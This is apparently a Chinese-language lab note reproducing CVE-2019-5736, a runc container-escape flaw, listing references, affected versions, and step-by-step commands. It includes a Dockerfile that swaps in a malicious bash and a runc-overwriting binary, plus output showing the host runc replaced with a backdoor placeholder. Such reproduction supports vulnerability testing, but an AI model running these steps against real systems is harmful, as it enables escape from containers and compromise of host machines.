參考資訊:
https://github.com/q3k/cve-2019-5736-poc
https://www.cvedetails.com/cve/CVE-2019-5736/
https://github.com/twistlock/RunC-CVE-2019-5736
https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/containerd.io_1.2.0-1_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce_18.09.0~3-0~debian-buster_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb
測試環境:
Ubuntu 18.04 (4.15.0-20-generic)
Affected runc: 1.0.0-rc6
Affected Docker: < 18.09.2
測試步驟:
# cd # git clone https://github.com/twistlock/RunC-CVE-2019-5736 # cd RunC-CVE-2019-5736/exec_POC # vim Dockerfile FROM ubuntu:18.04 COPY replace.sh / RUN ["chmod", "+x", "/replace.sh"] COPY overwrite_runc /overwrite_runc RUN ["chmod", "+x", "/overwrite_runc"] COPY new_runc / RUN ["mv", "/bin/bash", "/bin/bash_original"] COPY bash_evil /bin/bash RUN ["chmod", "+x", "/bin/bash"] ENTRYPOINT ["/bin/bash_original", "/replace.sh"] # docker build -t cve . # docker run --rm --name test cve [+] Waiting for runC to be executed in the container...
開啟另一個視窗
# docker exec test bash No help topic for '/bin/bash'
完成
# docker run --rm --name test cve [+] Waiting for runC to be executed in the container... [+] Got /proc/1071/exe as fd 3 in this process [+] Opened runC (using /proc/self/fd/3) for writing [+] Succesfully overwritten runC [+] Done, shuting down ... # runc -v **THE ALL NEW AND IMPROVED RUNC** [+] Your backdoor here ->